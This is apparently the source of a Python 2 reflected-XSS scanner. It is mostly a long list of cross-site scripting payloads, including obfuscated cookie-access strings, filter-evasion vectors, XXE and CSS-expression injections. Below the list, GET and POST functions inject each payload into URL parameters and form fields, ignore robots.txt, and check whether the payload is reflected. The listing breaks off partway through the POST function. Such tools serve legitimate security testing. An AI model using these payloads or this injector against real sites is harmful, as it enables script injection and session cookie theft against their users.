'this["ale"+(!![]+[])[-~[]]+(!![]+[])[+[]]]()', 'this["ale"+"\\x72\\x74"]()', 'this["\\x61\\x6c\\x65\\x72\\x74"]()', "this['ale'+'\\x72\\x74']()", "this['\\x61\\x6c\\x65\\x72\\x74']()", 'this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))', 'this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]', 'this["document"]["cookie"]', 'this["document"]["\\x63\\x6f\\x6f\\x6b\\x69\\x65"]', 'this["\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74"]["cookie"]', 'this["\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74"]["\\x63\\x6f\\x6f\\x6b\\x69\\x65"]', 'this["document"][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]', 'this["document"][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\\x6b\\x69\\x65"]', 'this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\\x6b\\x69\\x65"]', 'this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]', 'this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["\\x63\\x6f\\x6f\\x6b\\x69\\x65"]', 'this["docum"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["cookie"]', 'this["\\x64\\x6f\\x63\\x75\\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\\x6b\\x69\\x65"]', 'this["\\x64\\x6f\\x63\\x75\\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]', 'this["\\x64\\x6f\\x63\\x75\\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["\\x63\\x6f\\x6f\\x6b\\x69\\x65"]', 'this["\\x64\\x6f\\x63\\x75\\x6d"+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]["cookie"]', "this['document']['cookie']", 
"this['document']['\\x63\\x6f\\x6f\\x6b\\x69\\x65']", "this['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['cookie']", "this['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x63\\x6f\\x6f\\x6b\\x69\\x65']", "this['document'][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']", "this['document'][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\\x6b\\x69\\x65']", "this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\\x6b\\x69\\x65']", "this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']", "this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['\\x63\\x6f\\x6f\\x6b\\x69\\x65']", "this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['cookie']", "this['\\x64\\x6f\\x63\\x75\\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\\x6b\\x69\\x65']", "this['\\x64\\x6f\\x63\\x75\\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']", "this['\\x64\\x6f\\x63\\x75\\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['\\x63\\x6f\\x6f\\x6b\\x69\\x65']", "this['\\x64\\x6f\\x63\\x75\\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['cookie']", 'document["cookie"]', 'document["\\x63\\x6f\\x6f\\x6b\\x69\\x65"]', 'document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"kie"]', 'document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+"\\x6b\\x69\\x65"]', "document['cookie']", "document['\\x63\\x6f\\x6f\\x6b\\x69\\x65']", "document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']", 
"document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\\x6b\\x69\\x65']", '%3Cscript%3Edocument.body.innerHTML=%22%3Ca%20onmouseover%0B=location=%27\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x63\\x6F\\x6E\\x66\\x69\\x72\\x6D\\x26\\x6C\\x70\\x61\\x72\\x3B\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x63\\x6F\\x6F\\x6B\\x69\\x65\\x26\\x72\\x70\\x61\\x72\\x3B%27%3E%3Cinput%20name=attributes%3E%22;%3C/script%3E', '<meta http-equiv="X-UA-Compatible" content="IE=5"><p style="font-family:\',;a\\\\22\\\\3e\\\\3cimg\\\\20src\\\\3dx\\\\20onerror\\\\3d\\\\61lert\\\\28\\\\31\\\\29\\\\3e:1\'">oh-oh</p>', '"><meta http-equiv="X-UA-Compatible" content="IE=5"><p style="font-family:\',;a\\\\22\\\\3e\\\\3cimg\\\\20src\\\\3dx\\\\20onerror\\\\3d\\\\61lert\\\\28\\\\31\\\\29\\\\3e:1\'">oh-oh</p>', '\'><meta http-equiv="X-UA-Compatible" content="IE=5"><p style="font-family:\',;a\\\\22\\\\3e\\\\3cimg\\\\20src\\\\3dx\\\\20onerror\\\\3d\\\\61lert\\\\28\\\\31\\\\29\\\\3e:1\'">oh-oh</p>', "<iframe/onload=action=/confir/.source+'m';eval(action)(1)>", '"><iframe/onload=action=/confir/.source+\'m\';eval(action)(1)>', "'><iframe/onload=action=/confir/.source+'m';eval(action)(1)>", '<!--[if WindowsEdition]><script>confirm(1);</script><![endif]-->', '"><!--[if WindowsEdition]><script>confirm(1);</script><![endif]-->', "'><!--[if WindowsEdition]><script>confirm(1);</script><![endif]-->", '<img src=x onerror=confirm(/X/)>', '"><img src=x onerror=confirm(/X/)>', "'><img src=x onerror=confirm(/X/)>", '<form/action=ja	vascr	ipt:confirm(1)> <button/type=submit>', '"><form/action=ja	vascr	ipt:confirm(1)> <button/type=submit>', "'><form/action=ja	vascr	ipt:confirm(1)> <button/type=submit>", '<style/onload = !-alert(1)>', '"><style/onload = !-alert(1)>', "'><style/onload = !-alert(1)>", '<iframe/name="if(0){\\u0061lert(1)}else{\\u0061lert(1)}"/onload="eval(name)";>', 
'"><iframe/name="if(0){\\u0061lert(1)}else{\\u0061lert(1)}"/onload="eval(name)";>', '\'><iframe/name="if(0){\\u0061lert(1)}else{\\u0061lert(1)}"/onload="eval(name)";>', '<svg><?GMO=`<ftw=`skrowtillehehtwoh; onload=confirm(location);', '"><svg><?GMO=`<ftw=`skrowtillehehtwoh; onload=confirm(location);', "'><svg><?GMO=`<ftw=`skrowtillehehtwoh; onload=confirm(location);", '"><img src=x onerror=confirm(1);>', '#"><img src=x onerror=confirm(1);>', '<img/src=x alt=confirm(1) onerror=eval(alt)>', '"><img/src=x alt=confirm(1) onerror=eval(alt)>', "'><img/src=x alt=confirm(1) onerror=eval(alt)>", '<img src=x onerror=alert(1)//>', '"><img src=x onerror=alert(1)//>', "'><img src=x onerror=alert(1)//>", '<svg><g/onload=alert(1)//', '"><svg><g/onload=alert(1)//', "'><svg><g/onload=alert(1)//", '<iframe/\\/src=jAva	script:alert(1)>', '"><iframe/\\/src=jAva	script:alert(1)>', "'><iframe/\\/src=jAva	script:alert(1)>", '<math><mi//xlink:href="data:x,<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>">', 'onClick="alert(\'Hello \\u0022>\')"', 'onload=alert(1)', '" onload=alert(1) "', '" onload=alert(1)', 'onload=alert(1) "', '" onload=alert(1) id="a', 'onload =alert(1) id="a', "<a href='", '"><a href=\'', "'><a href='", "javascript:alert(1)'>a</a>", '<listing><img onerror="alert(1);//" src=1><t t></listing>', '"><listing><img onerror="alert(1);//" src=1><t t></listing>', '\'><listing><img onerror="alert(1);//" src=1><t t></listing>', "<img src=x id/=' onerror=alert(1)//'>", '"><img src=x id/=\' onerror=alert(1)//\'>', "'><img src=x id/=' onerror=alert(1)//'>", '<textarea>X</textarea><!--</textarea><img src=x onerror=alert(1)>-->', '"><textarea>X</textarea><!--</textarea><img src=x onerror=alert(1)>-->', "'><textarea>X</textarea><!--</textarea><img src=x onerror=alert(1)>-->", '<b><noscript><!-- </noscript><img src=xx: onerror=alert(1) 
--></noscript>', '"><b><noscript><!-- </noscript><img src=xx: onerror=alert(1) --></noscript>', "'><b><noscript><!-- </noscript><img src=xx: onerror=alert(1) --></noscript>", '<b><noscript><a alt="</noscript><img src=xx: onerror=alert(1)>"></noscript>', '"><b><noscript><a alt="</noscript><img src=xx: onerror=alert(1)>"></noscript>', '\'><b><noscript><a alt="</noscript><img src=xx: onerror=alert(1)>"></noscript>', '<body><template><s><template><s><img src=x onerror=alert(1)>X</s></template></s></template>', '"><body><template><s><template><s><img src=x onerror=alert(1)>X</s></template></s></template>', "'><body><template><s><template><s><img src=x onerror=alert(1)>X</s></template></s></template>", '<a href="\x01java\x03script:alert(1)">X<a>', '"><a href="\x01java\x03script:alert(1)">X<a>', '\'><a href="\x01java\x03script:alert(1)">X<a>', '\x01<option><style></option></select><b><img src=xx: onerror=alert(1)></style></option>', '<option><iframe></select><b><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script></iframe></option>', '<b><style><style/><img src=xx: onerror=alert(1)>', '"><b><style><style/><img src=xx: onerror=alert(1)>', "'><b><style><style/><img src=xx: onerror=alert(1)>", '<b><style><style////><img src=xx: onerror=alert(1)></style>', '"><b><style><style////><img src=xx: onerror=alert(1)></style>', "'><b><style><style////><img src=xx: onerror=alert(1)></style>", '<image name=body><image name=adoptNode>X<image name=firstElementChild><svg onload=alert(1)>', '"><image name=body><image name=adoptNode>X<image name=firstElementChild><svg onload=alert(1)>', "'><image name=body><image name=adoptNode>X<image name=firstElementChild><svg onload=alert(1)>", '<image name=activeElement><svg onload=alert(1)>', '"><image name=activeElement><svg onload=alert(1)>', "'><image name=activeElement><svg onload=alert(1)>", '<image 
name=body><img src=x><svg onload=alert(1); autofocus>, <keygen onfocus=alert(1); autofocus>', '"><image name=body><img src=x><svg onload=alert(1); autofocus>, <keygen onfocus=alert(1); autofocus>', "'><image name=body><img src=x><svg onload=alert(1); autofocus>, <keygen onfocus=alert(1); autofocus>", '<div onmouseout="javascript:alert(/X/)" x=yscript: n>X', '"><div onmouseout="javascript:alert(/X/)" x=yscript: n>X', '\'><div onmouseout="javascript:alert(/X/)" x=yscript: n>X', '<div wow=removeme onmouseover=alert(1)>text', '"><div wow=removeme onmouseover=alert(1)>text', "'><div wow=removeme onmouseover=alert(1)>text", '<input x=javascript: autofocus onfocus=alert(1)><svg id=1 onload=alert(1)></svg>', '"><input x=javascript: autofocus onfocus=alert(1)><svg id=1 onload=alert(1)></svg>', "'><input x=javascript: autofocus onfocus=alert(1)><svg id=1 onload=alert(1)></svg>", '<form action="javascript:alert(1)"><button>X</button></form>', '"><form action="javascript:alert(1)"><button>X</button></form>', '\'><form action="javascript:alert(1)"><button>X</button></form>', '0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts(\'data:;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==\'))', '<input onfocus=alert(1) autofocus>', '"><input onfocus=alert(1) autofocus>', "'><input onfocus=alert(1) autofocus>", '<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg', '"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg', '\'><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>', '"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>', '\'><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>', '<x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>', '"><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>', '\'><x 
repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>', '<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>', '"><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>', "'><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>", '<script>({0:#0=alert/#0#/#0#(0)})</script>', '</ScrIpt><script>({0:#0=alert/#0#/#0#(0)})</script>', '"><script>({0:#0=alert/#0#/#0#(0)})</script>', '</ScrIpt><script>({0:#0=alert/#0#/#0#(0)})</script>', "'><script>({0:#0=alert/#0#/#0#(0)})</script>", '</ScrIpt><script>({0:#0=alert/#0#/#0#(0)})</script>', 'X<x style=`behavior:url(#default#time2)` onbegin=`alert(1)` >', '<meta charset="x-mac-farsi">?script ?alert(1)//?/script ?', '"><meta charset="x-mac-farsi">?script ?alert(1)//?/script ?', '\'><meta charset="x-mac-farsi">?script ?alert(1)//?/script ?', '<input onblur=focus() autofocus><input>', '"><input onblur=focus() autofocus><input>', "'><input onblur=focus() autofocus><input>", '<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(1)>X</button>', '"><form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(1)>X</button>', "'><form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(1)>X</button>", '1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>', '1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>', '<link rel=stylesheet href=data:,*%7bx:expression(alert(1))%7d', '"><link rel=stylesheet href=data:,*%7bx:expression(alert(1))%7d', "'><link rel=stylesheet href=data:,*%7bx:expression(alert(1))%7d", '<style>@import "data:,*%7bx:expression(alert(1))%7D";</style>', '"><style>@import "data:,*%7bx:expression(alert(1))%7D";</style>', '\'><style>@import 
"data:,*%7bx:expression(alert(1))%7D";</style>', '<table background="javascript:alert(32)"></table>', '"><table background="javascript:alert(32)"></table>', '\'><table background="javascript:alert(32)"></table>', '<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(1)">XXX</a>', '"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(1)">XXX</a>', '\'><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(1)">XXX</a>', '<![><img src="]><img src=x onerror=alert(1)//">', '"><![><img src="]><img src=x onerror=alert(1)//">', '\'><![><img src="]><img src=x onerror=alert(1)//">', '<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(1)//"></svg>', '"><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(1)//"></svg>', '\'><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(1)//"></svg>', '<<style><img src="</style><img src=x onerror=alert(1)//">', '"><<style><img src="</style><img src=x onerror=alert(1)//">', '\'><<style><img src="</style><img src=x onerror=alert(1)//">', '"><style><img src="</style><img src=x onerror=alert(1)//">', '\'><style><img src="</style><img src=x onerror=alert(1)//">', '<<li style=list-style:url() onerror=alert(1)></li>', '"><<li style=list-style:url() onerror=alert(1)></li>', "'><<li style=list-style:url() onerror=alert(1)></li>", '"><li style=list-style:url() onerror=alert(1)></li>', "'><li style=list-style:url() onerror=alert(1)></li>", '<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>', '"><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>', "'><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>", '<video 
onerror="alert(1)"><source></source></video></div>', '"><video onerror="alert(1)"><source></source></video></div>', '\'><video onerror="alert(1)"><source></source></video></div>', '<b <script>alert(1)//</script>0</script></b>', '"><b <script>alert(1)//</script>0</script></b>', "'><b <script>alert(1)//</script>0</script></b></div>", '"><b <script>alert(1)//</script>0</script></b></div>', "'><b <script>alert(1)//</script>0</script></b></div>", '<b><script<b></b><alert(1)</script </b></b>', '"><b><script<b></b><alert(1)</script </b></b>', "'><b><script<b></b><alert(1)</script </b></b></div>", '"><b><script<b></b><alert(1)</script </b></b></div>', "'><b><script<b></b><alert(1)</script </b></b></div>", '<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>', '"><div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>', '\'><div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script></div>', '"><div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script></div>', '\'><div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script></div>', '<x \'="foo"><x foo=\'><img src=x onerror=alert(1)//\'>', '"><x \'="foo"><x foo=\'><img src=x onerror=alert(1)//\'>', '\'><x \'="foo"><x foo=\'><img src=x onerror=alert(1)//\'>', '<! \'="foo"><x foo=\'><img src=x onerror=alert(1)//\'>', '"><! \'="foo"><x foo=\'><img src=x onerror=alert(1)//\'>', '\'><! 
\'="foo"><x foo=\'><img src=x onerror=alert(1)//\'>', '<? \'="foo"><x foo=\'><img src=x onerror=alert(1)//\'>', '"><? \'="foo"><x foo=\'><img src=x onerror=alert(1)//\'>', '\'><? \'="foo"><x foo=\'><img src=x onerror=alert(1)//\'>', '<div id="1"><embed src="javascript:alert(1)">', '"><embed src="javascript:alert(1)">', '\'><embed src="javascript:alert(1)"></embed>', '<script src="javascript:alert(1)">', '"><script src="javascript:alert(1)">', '\'><script src="javascript:alert(1)"></script>', '"><script src="javascript:alert(1)"></script>', '\'><script src="javascript:alert(1)"></script>', '<!DOCTYPE x[<!ENTITY x SYSTEM "http://127.0.0.1:3555/xss_serve_payloads/X.xxe">]><y>&x;</y>', '"><!DOCTYPE x[<!ENTITY x SYSTEM "http://127.0.0.1:3555/xss_serve_payloads/X.xxe">]><y>&x;</y>', '\'><!DOCTYPE x[<!ENTITY x SYSTEM "http://127.0.0.1:3555/xss_serve_payloads/X.xxe">]><y>&x;</y>', '<?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version=\'1.0\' xmlns:xsl=\'http://www.w3.org/1999/XSL/Transform\' id=\'xss\'%3E%3Cxsl:output method=\'html\'/%3E%3Cxsl:template match=\'/\'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?>', '"><?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version=\'1.0\' xmlns:xsl=\'http://www.w3.org/1999/XSL/Transform\' id=\'xss\'%3E%3Cxsl:output method=\'html\'/%3E%3Cxsl:template match=\'/\'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?>', '\'><?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version=\'1.0\' xmlns:xsl=\'http://www.w3.org/1999/XSL/Transform\' id=\'xss\'%3E%3Cxsl:output method=\'html\'/%3E%3Cxsl:template match=\'/\'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?>', 'onerror CDATA "alert(1)"', 'onload CDATA "alert(1)">', '<html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x>', '"><html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x>', '\'><html:style /><x 
xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x>', '<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>', '"><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>', '\'><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>', '<div style=width:1px;filter:glow onfilterchange=alert(1)>x', '"><div style=width:1px;filter:glow onfilterchange=alert(1)>x', "'><div style=width:1px;filter:glow onfilterchange=alert(1)>x", '<// style=x:expression\x028alert(1)\x029>', '"><// style=x:expression\x028alert(1)\x029>', "'><// style=x:expression\x028alert(1)\x029>", '<event-source src="index.php" onload="alert(1)">', '"><event-source src="index.php" onload="alert(1)">', '\'><event-source src="index.php" onload="alert(1)">', '<a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>', '"><a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>', '\'><a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>', '<?xml-stylesheet type="text/css"?><root style="x:expression(alert(1))"/>', '"><?xml-stylesheet type="text/css"?><root style="x:expression(alert(1))"/>', '\'><?xml-stylesheet type="text/css"?><root style="x:expression(alert(1))"/>', '<object allowscriptaccess="always" data="test.swf"></object>', '"><object allowscriptaccess="always" data="test.swf"></object>', '\'><object allowscriptaccess="always" data="test.swf"></object>', '<style>*{x:??????????(alert(1))}</style>', '"><style>*{x:??????????(alert(1))}</style>', "'><style>*{x:??????????(alert(1))}</style>", '<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" 
xlink:href="javascript:alert(1)" xlink:type="simple"/>', '"><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>', '\'><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>', '<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(1));%7d"?>', '"><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(1));%7d"?>', '\'><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(1));%7d"?>', '<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>', '"><x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>', '\'><x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>', '<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>', '"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>', '\'><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>', '<body oninput=alert(1)><input autofocus>', '"><body oninput=alert(1)><input autofocus>', '\'><body oninput=alert(1)><input autofocus><div id="1"><svg xmlns="http://www.w3.org/2000/svg">', '"><body oninput=alert(1)><input autofocus><div id="1"><svg xmlns="http://www.w3.org/2000/svg">', '\'><body oninput=alert(1)><input autofocus><div id="1"><svg xmlns="http://www.w3.org/2000/svg">']
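def GET(url, level):
    """Check the query parameters of ``url`` for reflected, unencoded input.

    For every parameter in the query string, each probe string from the list
    selected by ``level`` (1-4 -> ``payload_1`` .. ``payload_4``; any other
    value selects no probes) is appended to the parameter's original value
    and requested with GET.  Only the probed parameter is sent in that
    request.  A probe that comes back verbatim in the response body means
    the page echoes that parameter without output encoding.

    The check is a plain substring match on the response body, so a hit
    shows reflection only; whether the browser would execute it still has
    to be confirmed by hand.

    Returns ``{'value': <parameter name>, 'payload': <probe string>}`` for
    the first reflection found, and ``None`` when nothing is reflected or
    any step fails.

    Python 2 only (``urlparse``, ``httplib``, ``urllib.urlopen``).

    NOTE(review): the nesting was reconstructed from a listing whose
    indentation was lost; confirm against the repository copy.
    """
    result = {'value': None, 'payload': None}
    try:
        target = urlparse.urlparse(url)

        # Connectivity probe: an unreachable host raises here and the scan is
        # skipped.  The connection is closed again at once; the original
        # left it open.
        # NOTE(review): the probe is always plain HTTP, so an HTTPS-only
        # host is treated as unreachable; confirm that this is intended.
        domain0 = '{uri.scheme}://{uri.netloc}/'.format(uri=target)
        domain = domain0.replace("https://", "").replace("http://", "").replace("www.", "").replace("/", "")
        connection = httplib.HTTPConnection(domain)
        try:
            connection.connect()
        finally:
            connection.close()

        if level == 1:
            payloads = payload_1
        elif level == 2:
            payloads = payload_2
        elif level == 3:
            payloads = payload_3
        elif level == 4:
            payloads = payload_4
        else:
            payloads = []

        parameters = urlparse.parse_qs(target.query, keep_blank_values=True)
        path = target.scheme + "://" + target.netloc + target.path

        for pn in parameters:
            for pv in parameters[pn]:
                for x in payloads:
                    # Skip list entries that are empty or whitespace only.
                    if not x.strip():
                        continue
                    enc = urllib.quote_plus(x)
                    data = path + "?" + pn + "=" + pv + enc
                    page = urllib.urlopen(data)
                    try:
                        sourcecode = page.read()
                    finally:
                        # Release the socket even when read() fails.
                        page.close()
                    if x in sourcecode:
                        result['value'] = pn
                        result['payload'] = x
                        return result
    except Exception:
        # Best effort, as before: any failure counts as "nothing found".
        # Unlike the former bare ``except``, Ctrl-C and SystemExit now
        # propagate, so a long scan can be interrupted.
        return None
    return None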
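def POST(domains, data, level):
    """Check the form fields in ``data`` for reflected, unencoded input.

    ``domains`` is the URL the form is posted to and ``data`` a
    URL-encoded field string (``a=1&b=2``).  For every field, each probe
    string from the list selected by ``level`` (1-4 -> ``payload_1`` ..
    ``payload_4``; any other value selects no probes) replaces that field's
    value, all other fields keep their submitted values, and the form is
    posted through a ``mechanize`` browser that ignores robots.txt and
    refresh redirects.  A probe that comes back verbatim in the response
    body means the page echoes that field without output encoding.

    The check is a plain substring match on the response body, so a hit
    shows reflection only; whether the browser would execute it still has
    to be confirmed by hand.

    Returns ``{'value': <field name>, 'payload': <probe string>}`` for the
    first reflection found, and ``None`` when nothing is reflected or any
    step fails.

    Python 2 only (``urlparse``, ``httplib``, ``urllib.urlencode``).

    NOTE(review): the nesting was reconstructed from a listing whose
    indentation was lost; confirm against the repository copy.
    """
    results = {'value': None, 'payload': None}
    try:
        br = mechanize.Browser()
        br.addheaders = [('User-agent',
                          'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11)Gecko/20071127 Firefox/2.0.0.11')]
        br.set_handle_robots(False)
        br.set_handle_refresh(False)

        target = urlparse.urlparse(domains)

        # Connectivity probe: an unreachable host raises here and the scan is
        # skipped.  The connection is closed again at once; the original
        # left it open.
        # NOTE(review): the probe is always plain HTTP, so an HTTPS-only
        # host is treated as unreachable; confirm that this is intended.
        domain0 = '{uri.scheme}://{uri.netloc}/'.format(uri=target)
        domain = domain0.replace("https://", "").replace("http://", "").replace("www.", "").replace("/", "")
        connection = httplib.HTTPConnection(domain)
        try:
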